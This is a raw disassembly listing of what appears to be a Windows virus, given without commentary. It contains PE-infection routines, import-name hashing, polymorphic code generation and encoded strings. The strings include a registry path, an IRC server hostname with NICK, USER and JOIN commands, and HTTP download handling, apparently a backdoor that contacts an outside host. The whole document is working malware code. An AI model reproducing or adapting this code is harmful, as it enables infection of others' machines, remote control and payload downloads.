		jnb	short near ptr loc_31430971+1
		outsb


loc_3143090E:				; CODE XREF: sub_3143059F:loc_31430894j
		add	fs:[ebx+6Fh], dh


loc_31430912:				; CODE XREF: sub_3143059F+30Dj
		arpl	[ebx+65h], bp


loc_31430915:				; CODE XREF: sub_3143059F+30Bj
		jz	short $+2
		dec	ecx
		outsb
		jz	short loc_31430980
		jb	short loc_3143098B
		db	65h
		jz	short loc_31430963
		insb
		outsd
		jnb	short near ptr loc_31430988+1
		dec	eax
		popa
		outsb
		db	64h
		insb
		add	gs:[ecx+6Eh], cl
		jz	short loc_31430994
		jb	short near ptr loc_3143099E+1


loc_31430931:				; CODE XREF: sub_3143059F+329j
		db	65h
		jz	short loc_3143097B


loc_31430934:				; CODE XREF: sub_3143059F:loc_314308B9j
		db	65h
		jz	short loc_3143097A
		outsd
		outsb
		outsb


loc_3143093A:				; CODE XREF: sub_3143059F+331j
		arpl	gs:[ebp+64h], si
		push	ebx


loc_31430940:				; CODE XREF: sub_3143059F+33Ej
		jz	short near ptr loc_314309A2+1
		jz	short loc_314309A9
		add	[ecx+6Eh], cl


loc_31430947:				; CODE XREF: sub_3143059F:loc_314308D3j
		jz	short near ptr loc_314309AC+2
		jb	short loc_314309B9
		db	65h
		jz	short near ptr loc_3143099B+2


loc_3143094E:				; CODE XREF: sub_3143059F:loc_314308E7j
		jo	short loc_314309B5
		outsb
		inc	ecx


loc_31430952:				; CODE XREF: sub_3143059F+342j
		add	[ecx+6Eh], cl


loc_31430955:				; CODE XREF: sub_3143059F+340j
		jz	short near ptr loc_314309BB+1
		jb	short loc_314309C7


loc_31430959:				; CODE XREF: sub_3143059F+34Aj
		db	65h
		jz	short near ptr loc_314309AA+1
		jo	short loc_314309C3
		outsb
		push	ebp
		jb	short near ptr loc_314309CC+2
		inc	ecx


loc_31430963:				; CODE XREF: sub_3143059F+37Ej
					; sub_3143059F:loc_314308F9j
		add	[ecx+6Eh], cl
		jz	short near ptr loc_314309CC+1
		jb	short loc_314309D8
		db	65h
		jz	short near ptr loc_314309BE+1
		db	65h
		popa
		db	64h
		inc	esi


loc_31430971:				; CODE XREF: sub_3143059F+36Cj
					; sub_3143059F+35Ej
		imul	ebp, [ebp+0], 41564441h
		push	eax


loc_3143097A:				; CODE XREF: sub_3143059F:loc_31430934j
		dec	ecx


loc_3143097B:				; CODE XREF: sub_3143059F:loc_31430931j
		xor	esi, [edx]
		db	2Eh
		inc	esp
		dec	esp


loc_31430980:				; CODE XREF: sub_3143059F+37Aj
		dec	esp
		add	[edx+65h], dl
		db	67h
		inc	ebx
		insb
		outsd


loc_31430988:				; CODE XREF: sub_3143059F+383j
		jnb	short near ptr loc_314309ED+2
		dec	ebx


loc_3143098B:				; CODE XREF: sub_3143059F+37Cj
		db	65h
		jns	short $+3
		push	edx
		db	65h, 67h
		dec	edi
		jo	short loc_314309F9


loc_31430994:				; CODE XREF: sub_3143059F+38Ej
		outsb
		dec	ebx
		db	65h
		jns	short near ptr loc_314309DC+2
		js	short loc_314309DC


loc_3143099B:				; CODE XREF: sub_3143059F+3ACj
		add	[edx+65h], dl


loc_3143099E:				; CODE XREF: sub_3143059F+390j
		db	67h
		push	ecx
		jnz	short loc_31430A07


loc_314309A2:				; CODE XREF: sub_3143059F:loc_31430940j
		jb	short near ptr loc_31430A1C+1
		push	esi
		popa
		insb
		jnz	short near ptr loc_31430A0D+1


loc_314309A9:				; CODE XREF: sub_3143059F+3A3j
		inc	ebp


loc_314309AA:				; CODE XREF: sub_3143059F:loc_31430959j
		js	short loc_314309ED


loc_314309AC:				; CODE XREF: sub_3143059F:loc_31430947j
		add	[edx+65h], dl
		db	67h
		push	ebx
		db	65h
		jz	short loc_31430A0A
		popa


loc_314309B5:				; CODE XREF: sub_3143059F:loc_3143094Ej
		insb
		jnz	short near ptr loc_31430A1C+1
		inc	ebp


loc_314309B9:				; CODE XREF: sub_3143059F+3AAj
		js	short loc_314309FC


loc_314309BB:				; CODE XREF: sub_3143059F:loc_31430955j
		add	[esi+33h], dl


loc_314309BE:				; CODE XREF: sub_3143059F+3CBj
		imul	byte ptr [edx+2]
		push	esi
		push	esi


loc_314309C3:				; CODE XREF: sub_3143059F+3BDj
		mov	edx, esp
		push	1


loc_314309C7:				; CODE XREF: sub_3143059F+3B8j
		push	edx
		push	dword ptr [edx+18h]
		push	esi


loc_314309CC:				; CODE XREF: sub_3143059F+3C7j
					; sub_3143059F+3C1j
		call	dword ptr [ebp+10427Ch]
		mov	eax, esp
		push	esi
		push	esi
		push	esi
		push	eax


loc_314309D8:				; CODE XREF: sub_3143059F+3C9j
		push	esi
		push	dword ptr [eax+18h]


loc_314309DC:				; CODE XREF: sub_3143059F+3FAj
					; sub_3143059F+3F7j
		call	dword ptr [ebp+103EEAh]
		add	esp, 10h
		pop	esi
		retn	8
; END OF FUNCTION CHUNK	FOR sub_3143059F
; ---------------------------------------------------------------------------
		db  8Dh	; 
		db  49h	; I
		db 0FBh	; 
		db  2Bh	; +
; ---------------------------------------------------------------------------


loc_314309ED:				; CODE XREF: sub_3143059F:loc_314309AAj
					; sub_3143059F:loc_31430988j
		enter	6851h, 0
; ---------------------------------------------------------------------------
		db    0
		db    0
		db 0E8h	; 
		db  8Dh	; 
		db  4Ch	; L
		db  24h	; $
		db    3
		db  6Ah	; j
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_3143059F


loc_314309F9:				; CODE XREF: sub_3143059F+3F3j
		add	[edx+5], ch


loc_314309FC:				; CODE XREF: sub_3143059F:loc_314309B9j
		push	ecx
		push	eax
		push	ebx
		push	5
		mov	ecx, esp
		push	eax
		mov	edx, esp
		push	eax


loc_31430A07:				; CODE XREF: sub_3143059F+401j
		push	esp
		push	40h


loc_31430A0A:				; CODE XREF: sub_3143059F+412j
		push	ecx
		push	edx
		push	ebx


loc_31430A0D:				; CODE XREF: sub_3143059F+408j
		call	dword ptr [ebp+103F12h]
		add	esp, 0Ch
		call	dword ptr [ebp+103F1Ah]


loc_31430A1C:				; CODE XREF: sub_3143059F:loc_314309A2j
					; sub_3143059F+417j
		add	esp, 8
		retn
; END OF FUNCTION CHUNK	FOR sub_3143059F
; ---------------------------------------------------------------------------
		db  8Dh	; 
		db  95h	; 
		db  20h
		db  3Eh	; >
		db  10h
		db    0
		db  33h	; 3
		db 0C9h	; 
		db  6Ah	; j
		db    0
		db  52h	; R
		db  68h	; h
		db  30h	; 0
		db    0
		db  32h	; 2
		db    0
		db  8Bh	; 
		db 0C4h	; 
		db  51h	; Q
		db  51h	; Q
		db  6Ah	; j
		db  40h	; @
		db  50h	; P
		db  51h	; Q
		db  6Ah	; j
		db  18h
		db  83h	; 
		db 0C0h	; 
		db    8
		db  54h	; T
		db  6Ah	; j
		db  0Eh
		db  50h	; P
		db 0FFh
		db  95h	; 
		db  0Eh
		db  3Fh	; ?
		db  10h
		db    0
		db  83h	; 
		db 0C4h	; 
		db  20h
		db  33h	; 3
		db 0D2h	; 
		db  85h	; 
		db 0C0h	; 
		db  0Fh
		db  99h	; 
		db 0C2h	; 
		db 0F7h	; 
		db 0DAh	; 
		db  58h	; X
		db  23h	; #
		db 0C2h	; 
		db 0C3h	; 
		db  57h	; W
		db  33h	; 3
		db 0FFh
		db 0E8h	; 
		db 0C1h	; 
		db 0FFh
		db 0FFh
		db 0FFh
		db  0Fh
		db  84h	; 
		db 0A5h	; 
		db    0
		db    0
		db    0
		db  50h	; P
		db  68h	; h
		db  18h
		db  73h	; s
		db    0
		db    0
		db  8Bh	; 
		db 0D4h	; 
		db  6Ah	; j
		db    0
		db  8Bh	; 
		db 0CCh	; 
		db  6Ah	; j
		db  40h	; @
		db  68h	; h
		db    0
		db    0
		db  10h
		db    0
		db  6Ah	; j
		db    2
		db  52h	; R
		db  6Ah	; j
		db    0
		db  68h	; h
		db  18h
		db  73h	; s
		db    0
		db    0
		db  6Ah	; j
		db    0
		db  51h	; Q
		db  53h	; S
		db  50h	; P
		db 0FFh
		db  95h	; 
		db    2
		db  3Fh	; ?
		db  10h
		db    0
		db  5Fh	; _
		db  59h	; Y
		db 0FFh
		db  95h	; 
		db  52h	; R
		db  3Eh	; >
		db  10h
		db    0
		db  85h	; 
		db 0FFh
		db  74h	; t
		db  71h	; q
		db  8Bh	; 
		db  8Dh	; 
		db  80h	; 
		db  15h
		db  10h
		db    0
		db 0E3h	; 
		db  0Ch
		db  8Dh	; 
		db  95h	; 
		db    0
		db  10h
		db  10h
		db    0
		db    3
		db 0D1h	; 
		db  57h	; W
		db  53h	; S
		db 0FFh
		db 0D2h	; 
		db  8Bh	; 
		db  85h	; 
		db 0EEh	; 
		db  3Eh	; >
		db  10h
		db    0
		db  8Dh	; 
		db  8Fh	; 
		db    6
		db  29h	; )
		db    0
		db    0
		db 0E8h	; 
		db  2Bh	; +
		db 0FFh
		db 0FFh
		db 0FFh
		db  8Bh	; 
		db  85h	; 
		db    6
		db  3Fh	; ?
		db  10h
		db    0
		db  8Dh	; 
		db  8Fh	; 
		db  53h	; S
		db  29h	; )
		db    0
		db    0
		db 0E8h	; 
		db  1Ah
		db 0FFh
		db 0FFh
		db 0FFh
		db  8Bh	; 
		db  85h	; 
		db 0F2h	; 
		db  3Eh	; >
		db  10h
		db    0
		db  8Dh	; 
		db  8Fh	; 
		db  5Ah	; Z
		db  29h	; )
		db    0
		db    0
		db 0E8h	; 
		db    9
		db 0FFh
		db 0FFh
		db 0FFh
		db  8Bh	; 
		db  85h	; 
		db 0F6h	; 
		db  3Eh	; >
		db  10h
		db    0
		db  85h	; 
		db 0C0h	; 
		db  74h	; t
		db  20h
		db  8Dh	; 
		db  8Fh	; 
		db  67h	; g
		db  29h	; )
		db    0
		db    0
		db 0E8h	; 
		db 0F4h	; 
		db 0FEh	; 
		db 0FFh
		db 0FFh
		db  8Bh	; 
		db  85h	; 
		db 0FEh	; 
		db  3Eh	; >
		db  10h
		db    0
		db  85h	; 
		db 0C0h	; 
		db  74h	; t
		db  0Bh
		db  8Dh	; 
		db  8Fh	; 
		db  74h	; t
		db  29h	; )
		db    0
		db    0
		db 0E8h	; 
		db 0DFh	; 
		db 0FEh	; 
		db 0FFh
		db 0FFh
		db  8Bh	; 
		db 0C7h	; 
		db  5Fh	; _
		db 0C3h	; 
		db  55h	; U
		db 0E8h	; 
		db    0
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------
		pop	ebp
		sub	ebp, 101B14h
		xor	ecx, ecx
		lea	eax, [ebp+101E9Fh]
		push	ecx
		push	esp
		push	ecx
		push	ecx
		push	eax
		push	ecx
		push	ecx
		call	dword ptr [ebp+103E7Eh]
		xchg	eax, [esp]
		call	dword ptr [ebp+103E52h]
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------
		db 55h,	0E8h, 0
		dd 5D000000h, 1B43ED81h, 0FF6A0010h, 1B0E958Dh,	52500010h
		dd 2420CDh, 0C483002Ah,	85C7660Ch, 101B54h, 85C720CDh
		dd 101B56h, 2A0024h, 1A6AC35Dh,	9E858h,	428D0000h, 0C9FEAA61h
		dd 69C3F075h, 103F6C95h, 8840500h, 95894208h, 103F6Ch
		dd 55C3E2F7h, 0E8h, 0ED815D00h,	101B9Dh, 3F709D8Bh, 7C830010h
		dd 0F000824h, 0B984h, 8EC8100h,	54000002h, 10468h, 0A695FF00h
		dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
		dd 0A295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
		dd 68016Ah, 52400000h, 3E6E95FFh, 85960010h, 505B74F6h
		dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F4Eh
		dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EE695FFh
		dd 85590010h, 56D075C0h, 3E5295FFh, 578D0010h, 6A575244h
		dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
		dd 3E7695FFh, 0C4810010h, 208h,	82474FFh, 3F3E95FFh, 0FF530010h
		dd 103F3E95h, 4C25D00h,	0A3E8000h, 8B460175h, 10157C8Dh
		dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh,	11F880Fh
		dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
		dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
		dd 6A51CEh, 0FF535651h,	103F3695h, 0C13B5900h, 0DF850Fh
		dd 858D0000h, 101E93h, 0C68006Ah, 50000000h, 3695FF53h
		dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
		dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh,	3C000000h
		dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
		dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
		dd 68752F2Fh, 0FF47C6h,	10BA310Fh, 0F7000027h, 95FF52E2h
		dd 103ED6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
		dd 64616Fh, 3F4695FFh, 0C0850010h, 0C9333674h, 3F708589h
		dd 68510010h, 80000200h, 50565151h, 3F4A95FFh, 958D0010h
		dd 101B97h, 54C93350h, 51525051h, 7E95FF51h, 8700103Eh
		dd 95FF2404h, 103E52h, 8D80C3F8h, 10156Fh, 6AC3F901h, 0FF016A01h
		dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh,	8D3C5003h
		dd 101DBBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
		dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
		dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F1295h,	868D8B00h
		dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
		dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
		dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
		dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
		dd 2007473h, 7F500000h,	70010000h, 69786F72h, 72692E6Dh
		dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 68797173h
		dd 76717067h, 4553550Ah, 4A662052h, 204E494Fh, 72697626h
		dd 550A7574h, 0E8h, 0ED815D00h,	101EA5h, 156F85C6h, 0FF000010h
		dd 103EAA95h, 1FE8C100h, 1E6A3C74h, 3E62B58Bh, 0AC590010h
		dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F66BDh,	2768B00h
		dd 0A566A557h, 38DC858Dh, 858F0010h, 103902h, 0FA4689FAh
		dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
		dd 8E84475h, 53000000h,	442E4346h, 0FF004C4Ch, 103EB695h
		dd 74C00B00h, 26A930Dh,	5E95FF53h, 0FF00103Eh, 97E893D0h
		dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EB695h
		dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh,	8DC93300h
		dd 10431485h, 51515100h, 51515051h, 0B295FF51h,	0E800103Eh
		dd 0Bh,	52455355h, 442E3233h, 0FF004C4Ch, 103EB695h, 0AE800h
		dd 73770000h, 6E697270h, 416674h, 5E95FF50h, 8900103Eh
		dd 103E6685h, 8D310F00h, 1019758Dh, 6C858900h, 5100103Fh
		dd 3EB695FFh, 68930010h, 4, 1982B58Dh, 8D590010h, 103F52BDh
		dd 0F5C2E800h, 0C766FFFFh, 101E6585h, 83500000h, 101E67A5h
		dd 958D0000h, 101E25h, 16A5450h, 6852006Ah, 80000002h
		dd 3F5695FFh, 0C0850010h, 8D22755Ah, 101E588Dh,	66A5200h
		dd 1E65B58Dh, 56540010h, 52515050h, 3F5A95FFh, 0FF580010h
		dd 103F5295h, 7385C600h, 1041h,	0CE8h, 4F535700h, 32334B43h
		dd 4C4C442Eh, 0B695FF00h, 9300103Eh, 768h, 0D9B58D00h
		dd 59001018h, 3F22BD8Dh, 3DE80010h, 0E8FFFFF5h,	0Ch, 494E4957h
		dd 2E54454Eh, 4C4C44h, 3EB695FFh, 0C0850010h, 235840Fh
		dd 68930000h, 5, 1917B58Dh, 8D590010h, 103F3EBDh, 0F506E800h
		dd 0BD83FFFFh, 103F42h,	10840F00h, 81000002h, 190ECh, 1685400h
		dd 0FF000001h, 103F2295h, 90C48100h, 50000001h,	6AD48Bh
		dd 4295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0D695FF00h
		dd 0EB00103Eh, 67BD83E2h, 101Eh, 858D2975h, 101E6Bh, 2E95FF50h
		dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
		dd 101E67h, 417385C6h, 6A010010h, 6A016A00h, 3A95FF02h
		dd 8300103Fh, 840FFFF8h, 160h, 63958D93h, 6A00101Eh, 0FF535210h
		dd 103F2A95h, 0FC08500h, 14085h, 84BD8D00h, 0B100101Eh
		dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh,	95FF5424h
		dd 103EAEh, 1E92BD8Dh, 1B10010h, 0FFFA1DE8h, 7F958DFFh
		dd 6A00101Eh, 146800h, 53520000h, 3F3695FFh, 448D0010h
		dd 958D1424h, 104314h, 0AB60F50h, 1424448Bh, 208E0C1h
		dd 4A12014Ah, 34A1202h,	824440Bh, 0C10FE180h, 0B5108E0h
		dd 0FF102444h, 0BD8D5032h, 103F74h, 1CE8h, 362E2500h, 202E2078h
		dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
		dd 95FF5700h, 103E66h, 0ACC481h, 6A0000h, 0FF535750h, 103F3695h
		dd 888D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h,	5, 0A642526h
		dd 95FF5700h, 103E66h, 500CC483h, 7680BEBh, 8D000000h
		dd 101E98BDh, 0FF535700h, 103F3695h, 7EC08500h,	74B58D54h
		dd 8300103Fh, 101588A5h, 8D8D0000h, 104173h, 6ACE2Bh, 0FF535651h
		dd 103F3295h, 0F88300h,	8B912F7Eh, 74B58DFEh, 0B000103Fh
		dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
		dd 2BCF8BEAh, 74BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
		dd 103F26h, 156FBD80h, 74010010h, 7530682Ah, 95FF0000h
		dd 103ED6h, 4173BD80h, 74000010h, 6785C711h, 101Eh, 0C6000000h
		dd 10417385h, 8E90000h,	0C7FFFFFEh, 10157885h, 0
		dd 4C25D80h, 4F0A0D00h,	6F6F6E20h, 666F206Eh, 66696C20h
		dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
		dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
		dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
		dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
		dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
		dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
		dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
		dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
		dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
		dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
		dd 10A61429h, 3AAB5957h, 606EF96Ah, 0C26CCC5Ch,	1Bh dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_31431404	proc near		; CODE XREF: sub_314314BA:loc_314314A8p
					; sub_3143150B+7p ...

arg_0		= dword	ptr  4

		pusha
		and	dword ptr [ebp+1042E4h], 0
		and	dword ptr [ebp+1042E8h], 0
		movzx	eax, word ptr [ebx+14h]
		lea	edx, [ebx+18h]
		movzx	ecx, word ptr [ebx+6]
		add	edx, eax


loc_31431420:				; CODE XREF: sub_31431404+41j
		mov	eax, [esp+20h+arg_0]
		sub	eax, [edx+0Ch]
		jb	short loc_31431442
		cmp	eax, [edx+8]
		jnb	short loc_31431442
		mov	eax, [edx+14h]
		sub	eax, [edx+0Ch]
		mov	[ebp+1042E4h], edx
		mov	[ebp+1042E8h], eax
		jmp	short loc_31431447
; ---------------------------------------------------------------------------


loc_31431442:				; CODE XREF: sub_31431404+23j
					; sub_31431404+28j
		add	edx, 28h
		loop	loc_31431420


loc_31431447:				; CODE XREF: sub_31431404+3Cj
		popa
		retn	4
sub_31431404	endp

; ---------------------------------------------------------------------------
		mov	[ebp+102457h], al
		call	sub_314314BA
		push	20h
		lea	eax, [ebp+102384h]
		pop	ecx


loc_31431462:				; CODE XREF: UPX2:31431469j
		cmp	[eax], ebx
		jz	short loc_31431472
		add	eax, 4
		loop	loc_31431462
		inc	dword ptr [ebp+1042C0h]
		retn
; ---------------------------------------------------------------------------


loc_31431472:				; CODE XREF: UPX2:31431464j
		neg	ecx
		add	ecx, [ebp+102457h]
		jecxz	short loc_3143148C


loc_3143147C:				; CODE XREF: UPX2:31431484j
		push	dword ptr [eax-4]
		pop	dword ptr [eax]
		sub	eax, 4
		loop	loc_3143147C
		mov	[ebp+102384h], ebx
; START	OF FUNCTION CHUNK FOR sub_314314BA


loc_3143148C:				; CODE XREF: UPX2:3143147Aj
					; sub_314314BA+34j
		cmp	dword ptr [edx], 0
		jz	short loc_31431496
		sub	esi, [edx]
		add	esi, [edx+10h]


loc_31431496:				; CODE XREF: sub_314314BA-2Bj
		lea	ecx, [esi-4]
		pop	eax
		pop	ebx
		pop	esi
		cmp	dword ptr [edx], 0
		jz	short loc_314314A5
		push	dword ptr [edx]
		jmp	short loc_314314A8
; ---------------------------------------------------------------------------


loc_314314A5:				; CODE XREF: sub_314314BA-1Bj
		push	dword ptr [edx+10h]


loc_314314A8:				; CODE XREF: sub_314314BA-17j
		call	sub_31431404
		sub	ecx, esi
		sub	ecx, [ebp+1042E8h]
		pop	eax
		add	ecx, [ebx+34h]
		retn
; END OF FUNCTION CHUNK	FOR sub_314314BA

; =============== S U B	R O U T	I N E =======================================



sub_314314BA	proc near		; CODE XREF: UPX2:31431451p

; FUNCTION CHUNK AT 3143148C SIZE 0000002E BYTES

		pop	dword ptr [ebp+1042C4h]
		mov	dword ptr [ebp+1042C0h], 0
		call	sub_3143150B
		mov	eax, [ebp+1042C0h]
		call	near ptr dword_31430B40+43h
		call	sub_314314F7
		cmp	dword ptr [ebp+1042C0h], 0
		jnz	short loc_314314F0
		mov	[ebp+102400h], ebx
		jmp	short loc_3143148C
; ---------------------------------------------------------------------------


loc_314314F0:				; CODE XREF: sub_314314BA+2Cj
		dec	dword ptr [ebp+1042C0h]
		retn
sub_314314BA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_314314F7	proc near		; CODE XREF: sub_314314BA+20p
		pop	dword ptr [ebp+1042C4h]
		mov	[ebp+1042C0h], edx
		call	sub_3143150B
		xor	ecx, ecx
		retn
sub_314314F7	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_3143150B	proc near		; CODE XREF: sub_314314BA+10p
					; sub_314314F7+Cp ...

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

		mov	edx, [ebx+80h]
		push	edx
		call	sub_31431404
		add	edx, [ebp+1042E8h]
		add	edx, esi


loc_3143151F:				; CODE XREF: sub_3143150B+120j
		cmp	dword ptr [edx+0Ch], 0
		jz	locret_31431630
		cmp	dword ptr [edx+10h], 0
		jz	locret_31431630
		mov	eax, [edx+0Ch]
		push	eax
		call	sub_31431404
		add	eax, [ebp+1042E8h]
		add	eax, esi
		push	eax


loc_31431545:				; CODE XREF: sub_3143150B+47j
		mov	cl, [eax]
		cmp	cl, 0
		jz	short loc_31431565
		cmp	cl, 2Eh
		jz	short loc_31431554


loc_31431551:				; CODE XREF: sub_3143150B+58j
		inc	eax
		jmp	short loc_31431545
; ---------------------------------------------------------------------------


loc_31431554:				; CODE XREF: sub_3143150B+44j
		mov	ecx, [eax+1]
		and	ecx, 0DFDFDFDFh
		cmp	ecx, 4C4C44h
		jnz	short loc_31431551


loc_31431565:				; CODE XREF: sub_3143150B+3Fj
		pop	ecx
		sub	ecx, eax
		cmp	ecx, 0FFFFFFFAh
		jg	loc_31431628
		cmp	word ptr [eax-2], 3233h
		jnz	loc_31431628
		push	esi
		cmp	dword ptr [edx], 0
		jnz	short loc_31431588
		mov	ecx, [edx+10h]
		jmp	short loc_3143158A
; ---------------------------------------------------------------------------


loc_31431588:				; CODE XREF: sub_3143150B+76j
		mov	ecx, [edx]


loc_3143158A:				; CODE XREF: sub_3143150B+7Bj
		add	esi, ecx
		push	ecx
		call	sub_31431404
		add	esi, [ebp+1042E8h]


loc_31431598:				; CODE XREF: sub_3143150B+90j
					; sub_3143150B+117j
		lodsd
		test	eax, eax
		js	short loc_31431598
		jz	loc_31431627
		push	dword ptr [ebp+1042E8h]
		push	eax
		call	sub_31431404
		add	eax, [ebp+1042E8h]
		pop	dword ptr [ebp+1042E8h]
		add	eax, [esp+4+var_4]
		push	ebx
		add	eax, 2
		xor	ebx, ebx


loc_314315C4:				; CODE XREF: sub_3143150B+CEj
		movzx	ecx, byte ptr [eax]
		jecxz	short loc_314315DB
		or	cl, 20h
		push	ebx
		shl	[esp+0Ch+var_C], 4
		sub	[esp+0Ch+var_C], ebx
		sub	[esp+0Ch+var_C], ecx
		pop	ebx
		inc	eax
		jmp	short loc_314315C4
; ---------------------------------------------------------------------------


loc_314315DB:				; CODE XREF: sub_3143150B+BCj
		cmp	ebx, 0DDBBD70Fh
		jz	short loc_31431621
		cmp	ebx, 0DB6E45A8h
		jz	short loc_31431621
		cmp	ebx, 0FFA13B59h
		jz	short loc_31431621
		cmp	ebx, 0ACB522D6h
		jz	short loc_31431621
		cmp	ebx, 0F358E993h
		jz	short loc_31431621
		cmp	ebx, 0F358E97Dh
		jz	short loc_31431621
		cmp	ebx, 0E1253F46h
		jz	short loc_31431621
		cmp	ebx, 0E1253F30h
		jz	short loc_31431621
		call	dword ptr [ebp+1042C4h]


loc_31431621:				; CODE XREF: sub_3143150B+D6j
					; sub_3143150B+DEj ...
		pop	ebx
		jmp	loc_31431598
; ---------------------------------------------------------------------------


loc_31431627:				; CODE XREF: sub_3143150B+92j
		pop	esi


loc_31431628:				; CODE XREF: sub_3143150B+60j
					; sub_3143150B+6Cj
		add	edx, 14h
		jmp	loc_3143151F
; ---------------------------------------------------------------------------

locret_31431630:			; CODE XREF: sub_3143150B+18j
					; sub_3143150B+22j
		retn
sub_3143150B	endp

; ---------------------------------------------------------------------------
		align 2
		dw 46Ah
		dd 0F549E858h, 9588FFFFh, 102631h, 1831B866h, 0E4C0E202h
		dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
		dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 31850250h, 0AA001026h
		dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
		dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
		dd 0C3BFE2ABh, 39BC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039B085h
		dd 0
; ---------------------------------------------------------------------------
		adc	[edi], cl
		xchg	eax, ebp
		rol	cl, 0E0h
		or	esi, esi
		test	[esi+1001039h],	ebp
		jnz	short loc_314316C6
		or	ax, 2589h
		jmp	short loc_314316D9
; ---------------------------------------------------------------------------


loc_314316C6:				; CODE XREF: UPX2:314316BEj
		test	byte ptr [ebp+1039AEh],	2
		jnz	short loc_314316D5
		or	ax, 2531h
		jmp	short loc_314316D9
; ---------------------------------------------------------------------------


loc_314316D5:				; CODE XREF: UPX2:314316CDj
		or	ax, 2501h


loc_314316D9:				; CODE XREF: UPX2:314316C4j
					; UPX2:314316D3j
		stosw
		call	near ptr dword_31431634+68h
		mov	eax, [ebx+34h]
		mov	[ebp+1042D8h], edx
		stosd
		retn

; =============== S U B	R O U T	I N E =======================================



sub_314316EB	proc near		; CODE XREF: UPX2:31431D37p
		test	dword ptr [ebp+1039B0h], 10000000h
		setnz	al
		add	al, 0BCh
		stosb
		call	near ptr dword_31431634+68h
		mov	[ebp+1042DCh], edx
		test	byte ptr [ebp+1039AEh],	1
		jnz	short loc_31431713
		rdtsc
		jmp	short loc_31431715
; ---------------------------------------------------------------------------


loc_31431713:				; CODE XREF: sub_314316EB+22j
		sub	eax, eax


loc_31431715:				; CODE XREF: sub_314316EB+26j
		stosd
		retn
sub_314316EB	endp


; =============== S U B	R O U T	I N E =======================================



sub_31431717	proc near		; CODE XREF: UPX2:loc_31431D41p
		test	dword ptr [ebp+1039B0h], 10000000h
		jz	short loc_3143174A
		mov	al, [ebp+1039AAh]
		shl	eax, 0Bh
		or	ax, 458Bh
		stosw
		mov	al, 0F8h
		stosb
		mov	al, [ebp+1039AAh]
		shl	eax, 1Bh
		add	eax, 6896467h
		stosd
		xor	eax, eax
		stosw
		jmp	short locret_3143175C
; ---------------------------------------------------------------------------


loc_3143174A:				; CODE XREF: sub_31431717+Aj
		mov	eax, 58F64h
		stosd
		mov	al, [ebp+1039AAh]
		add	al, 58h
		shl	eax, 18h
		stosd

locret_3143175C:			; CODE XREF: sub_31431717+31j
		retn
sub_31431717	endp


; =============== S U B	R O U T	I N E =======================================



sub_3143175D	proc near		; CODE XREF: sub_314317CF:loc_314317F6p
					; sub_314317CF+4Cp ...
		mov	byte ptr [ebp+10278Ch],	9
		jmp	short loc_3143178B
; ---------------------------------------------------------------------------


loc_31431766:				; CODE XREF: sub_3143175D+44j
		mov	al, 0FCh
